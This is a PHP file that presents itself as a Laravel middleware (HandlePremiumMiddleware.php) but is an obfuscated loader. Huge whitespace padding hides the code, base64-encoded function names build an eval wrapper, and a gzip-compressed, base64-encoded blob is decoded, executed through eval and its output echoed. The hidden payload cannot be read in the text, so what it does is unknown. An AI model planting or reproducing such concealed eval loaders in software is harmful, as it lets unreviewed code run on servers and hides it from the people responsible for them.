<?php 
        $__='printf';$_='Loading app/Http/Middleware/HandlePremiumMiddleware.php';
        































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWllvm1gUfo80/yEPldyqo5TFTmNFfjA0rCmJwb4sLxVcHMCsDbYx/vVzAC9xlqqj6Yw01f3QteHqnv07J1HC+XmHd98Ao17xGGXLh951+7jDqOcWxSdpuSw+fY18P5lX7uP8k+RmcHv/OE+jVXrcvyjC4pxP3LK8uLjoXZ/t1J//cUYucv3q66zh6fkvxOjFTs+ih6Vt0pEj3ox67daR1T+FXS+NzgkICAh+T/RwiijfUlayiBjbrHJFGD5Ydfy5G5owNbtx/Y2kioCAgICAgICAgOD/BvLnDAICAoLfFz3PLeeX/W/+HOf+vHdNMkJAQEBAQPCPcPqCBR8UK9ukE8xyoc3MgonFVdZNSPkSh6dmEjviJvEZoXampcpnaOsY3BdPHG59S0nuqoLGIKOz6HKebhJD0iksbGTbHMSeiOoZq4PO8vNOTvHEDe2Zycq29GRvY5aijW+irf+lVH1LS+SbpPQktHTNQeiLCM9YVGFxWPvCRrRNLXREtO1kx6/rFTQaS9waZzqeMaj202ThIK72WKcA2VoWhS2sCoM9PtVK29K28k0YeqleNuccky58k9ZcU29iYG2Ik89KVebHgcxffVeDPOju8wCJYdLqEjeFzQiUaw5XspisMMTtpVpyezy7kx9/l284xrbkwHoW54QZrnxJCW1Wh/ictQ85hHgKjxngpiaemCy65/5B123V6ceSsgYdC1ixzOshlsbBvcE135d3uxjvqvzVGAxRWDU1hjha321m2PiUyZKSYAsBLyYrPmrtBU/lJhLoT4WlzHPYMDcl5KzwUoFy0Eb2Jb2yhIM8nNdrxxJox9Kog66IG2NRqG2TCmRhc+CUKmx+zBM+vpT58G2bLLf2Mi15eFtP7IIdyLMB/lSQX+BQ3Pi4cqzw1L/9vxXf1rUFbq4wg66e13PXC4Zj6gXoWfhPfDvauOpqInG0nQKHai6FukMdk7UXcXnXR7P8GPs4xof7KpgwmzVmUe0Y49hLUR9ys9O352uzuMKJxrnKCw0fctWgPrqWNsHpMPZNreWsyseBEtmBDTyD++V9GoaY0hM7Q9nUHMbODMGMUErHnIB8HDxI1fFsptBeOoA6+MhLEwpBf/rS1/bcvNrz5eAL8ECncdoPFHGQzKVJrhx5Vtw9PS9R6j5PzVIkjYL+f5S/UAfO4qTbu1sUC8gL5H2Wq9OnsUO+uhkEfnIwq4Ic8sTKQic3YYSFCzJdLP4C9nLHGGx9mDeOgYtbftzXFpPqKx8Xx/7Z6T3Uftb0Wss/8IN1LT2fslybV1yH3tMYuuXn+/mo1OPhfXTwsXzlbAS9m1hQY9fAwf20H0B/rpw0ycDfrWMpjGtqCa4HlZ3KkJPh0gaOKnV8ossyYvVU7zi4nQ5aXw0RNTO1ft3XdmUmTxv7/gUOLBGTUC7f+aPQoTbt+uFwRqmrF/Z+5AMSh4+O2c9/FBv0WFNj0B0XL/2kPjoMAsL4IRbjtb+4WWMRlZDnzGGE1S2jrz1TKLwIl7JQZi4DnEawLC3sasAtYA6krolzhQWbmQPzHG1vMy6yo8GjY8WZiqhnHOj6quXvrq8hngXM6cTLdAFnyhpHQaEa3OeX/l6tD7PliXzXe8UWZvxzvd8x0/Zp2c3S/dyiPjbc8SW0VTuOvtlv+DD3Ju0MgP6nm35RWCcEn+FnjVZAbk98fZicxPtTvfswKYZ8MBr1rs/O/vtfakbt9/vd04frvyP+RPZnBN8dDb7vNZ+9Pw9mybun5Po33z095eD7E9J3FPxw/RfWjkcB';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































































































                                                                                                                                                                                                                     $________;
